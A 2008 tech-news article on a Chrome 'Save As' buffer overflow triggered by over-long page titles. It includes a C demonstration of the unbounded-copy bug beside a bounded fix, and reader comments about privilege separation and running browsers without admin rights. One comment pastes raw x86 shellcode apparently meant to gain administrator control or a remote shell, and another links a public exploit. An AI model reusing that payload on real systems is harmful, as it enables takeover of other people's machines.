Security firm spots Chrome 'SaveAs' flaw

It's been only a few days since Google released its Chrome browser, and security researchers are still digging into the software in search of the first few flaws.
A company in Vietnam has turned up the latest vulnerability in Chrome, according to a story posted to Information Week's Web site. Bach Khoa Internet Security says that the Chrome 0.2.149.27 release is susceptible to a critical buffer-overflow flaw, which could allow a remote attacker to take control of a PC. BKIS says it has reported the vulnerability to Google.
Here's how BKIS describes the vulnerability and how it could be exploited:
The vulnerability is caused due to a boundary error when handling the "SaveAs" function. On saving a malicious page with an overly long title (title tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users' systems. To exploit the vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Web site and convinces them to save this page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
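As an added illustration of the pattern BKIS describes (this is not Chrome's code and not from the BKIS report), the following C shows a "Save As" default-filename builder that copies the page title into a fixed-size stack buffer without a length check, next to a bounded version. The frame layout, the 32-byte buffer, the guard word and the sample title are assumptions made for the demonstration.

```c
/* Added example: a model of the "Save As" default-filename bug the quote
 * describes.  NOT Chrome's code and not from the BKIS report; the frame
 * layout, the 32-byte buffer and the guard field are assumptions made for
 * this demonstration. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF_LEN 32
#define GUARD_VALUE  0xC0FFEE42UL

/* Stand-in for a stack frame: the filename buffer is followed by a guard
 * word that plays the role of whatever really sits after the buffer on the
 * stack (saved registers, return address). */
struct save_frame {
    char          name[NAME_BUF_LEN];
    unsigned long guard;
};

/* Vulnerable pattern: the page <title> is copied into the fixed buffer with
 * no length check, as strcpy() would do.  The copy is written through a
 * pointer to the whole frame, and capped at the frame size, only so that the
 * overrun stays well-defined and observable in this demo; the real bug has
 * no such cap and keeps writing down the stack.
 * Returns 1 if the guard was clobbered (i.e. the overflow happened). */
int build_filename_unsafe(const char *title, struct save_frame *f)
{
    char  *dst   = (char *)f;
    size_t limit = sizeof *f;
    size_t i;

    f->guard = GUARD_VALUE;
    for (i = 0; title[i] != '\0' && i < limit; i++)
        dst[i] = title[i];
    if (i < limit)
        dst[i] = '\0';
    return f->guard != GUARD_VALUE;
}

/* Hardened version: copy at most outlen-1 bytes and always NUL-terminate.
 * Returns the number of bytes stored, or -1 for an unusable buffer.
 * Truncation is one policy; rejecting over-long titles outright (return -1
 * when strlen(title) >= outlen) is the other, and is often preferable when
 * the proposed name must stay meaningful to the user. */
int build_filename_safe(const char *title, char *out, size_t outlen)
{
    size_t n;

    if (out == NULL || outlen == 0)
        return -1;
    n = strlen(title);
    if (n >= outlen)
        n = outlen - 1;          /* truncate instead of running off the end */
    memcpy(out, title, n);
    out[n] = '\0';
    return (int)n;
}

int main(void)
{
    /* Constructed input: a title far longer than the buffer. */
    char long_title[256];
    struct save_frame f;
    char safe[NAME_BUF_LEN];

    memset(long_title, 'A', sizeof long_title - 1);
    long_title[sizeof long_title - 1] = '\0';

    printf("unsafe, short title: guard clobbered = %d\n",
           build_filename_unsafe("report.html", &f));
    printf("unsafe, long title:  guard clobbered = %d\n",
           build_filename_unsafe(long_title, &f));
    printf("safe,   long title:  stored %d bytes\n",
           build_filename_safe(long_title, safe, sizeof safe));
    printf("safe result: \"%s\"\n", safe);
    return 0;
}
```

The guard word is only a visible stand-in: on a real stack the bytes past the buffer are saved registers and the return address, which is what makes an over-long title controllable by the page author into arbitrary code execution rather than a mere crash.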
Earlier this week, security researcher Rishi Narang reported a flaw related to how Chrome, still in beta, behaves with undefined handlers, while another researcher, Aviv Raff, developed a proof-of-concept demo that showed Chrome could be hit with a carpet-bombing flaw.
Jonathan Skillings is managing editor of CNET News, based in the Boston bureau. He's been with CNET since 2000, after a decade in tech journalism at the IDG News Service, PC Week, and an AS/400 magazine. He's also been a soldier and a schoolteacher.



I have even heard "professional" programmers state that buffer overflows are impossible using newer languages that handle memory management automatically.
Marketing hype is great, isn't it? Unfortunately all you have to do is Google "Open Office Buffer Overflow" and you'll come across many such flaws in Open Office, and it's written in Java. Some of these even allow the execution of arbitrary code. Similar problems affect programs written in .NET too. Unfortunately even managed execution environments are still created with imperfect, native compilers. There's always going to be a gotcha.
\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49\x51\x89\xe1\x6a\x01\x51
IIRC it creates a reverse shell in Windows and starts listening for connection requests
Code meant for use in a buffer overflow exploit is not conveniently displayed in human-readable uncompiled C.
Also, the boundary of the buffer is probably going to be a little wider than what is displayed in the browser's title bar.
@rhsc: As long as you have folks who forget to sanitize their inputs, you will find the potential for blown buffers.
@the_vdog: PHP, ASP, and the like have the potential for that (injecting SQL commands into an unguarded input field), but throwing C source code uncompiled like that at a compiled binary won't get you very far. ;)
/P
@Null: If you mouse over the tab you'll see the full title.
So in my investigation of how saving off HTML (from a View Source) worked in Google's Chrome browser several days ago (before I saw this story), I used Mark Russinovich's Filemon tool to note what process was associated with saving the contents of a "View Source". I simply saved things off to:
C:\Windows\BadStuff.txt
Turns out, the ID belonged to the parent process that spawns off children (copies of Chrome.exe). Instead of threads, Chrome uses a privilege separation model and creates child Chrome.exe processes for each tab. These children do the actual HTML rendering and JavaScript execution but as I learned from my observations they are not involved in file I/O when it comes to saving off the contents of a "View Source". This surprised me a bit, namely, that the parent would save off the contents of doing a View Source.
I thought nothing of it but then I came across this story. Namely, someone finding a way to exploit the Chrome.exe parent process having administrative rights in a very unexpected way (that would be 99% of Windows XP users). However this exploit requires social engineering, which doesn't make this exploit a major flaw in my honest opinion.
This flaw showcases a bit of over-engineering on Google's part. By going on the premise that the children should not interact with the file system and asking the parent to save off HTML, the default access control lists (ACLs) in NTFS (NT File System) which would have prevented malice don't play a role. That's because if the children with no admin rights just did the work themselves an attacker would not have much leverage in instrumenting a machine, since any attempts to modify C:\Windows would by default fail.
But by having the parent Chrome.exe process do the work with admin rights on XP, an exploit is born.
So once again it is the same story I've been preaching for a while now: don't run *anything* that is associated with talking on the Net with administrative rights -- the principle of least privilege. While Google's Chrome makes things harder, there is no such thing as infallibility when it comes to the security of a software system. There are an infinite number of permutations you can feed a web browser, so it's best to assume the worst.
This is why you should use this tool (RemoveAdmin) with Google's Chrome browser (or ANY browser for that matter):
http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=lst-1&cdlPid=10835515
The RemoveAdmin installer creates shortcuts for IE and Firefox but if you look closely, it's a general purpose tool and you can create a new shortcut to launch Chrome (just provide a path to Chrome.exe as an argument).
RemoveAdmin strips out administrative rights on any process you wish to launch, thereby cutting the exploit talked about here at the knees.
-M
Vista is just as vulnerable to buffer overflows as any other OS that uses an Intel/AMD x86 CPU. The problem has nothing to do with permissions, but how the memory stack itself reacts to bad logic.
You basically confuse the CPU itself with a buffer overflow, then chuck in your malware commands during that state of confusion, which the CPU will act on no matter what permissions the commands may have (NX bit be damned).
/P
Besides, they could have done it in Java only to find out it had vulnerabilities anyway. Java isn't perfect on security either. The saddest thing of all in my opinion is that people still think you can take an imperfect language like C++ and imperfect programmers and yet somehow manage to create a perfectly secure virtual machine with them. Unfortunately that's just not the case. I wish it was though.
http://seclists.org/bugtraq/2008/Sep/0065.html
and Allows downloads of exe files with no prompt to open or save:
http://www.milw0rm.com/exploits/6355
and I'm sure they will find more yet.
by tinyang
September 8, 2008 12:49 PM PDT
I like the features in Chrome, but it is too new to use for those of us who are not on the bleeding edge of technology. Besides this it saves passwords in clear text: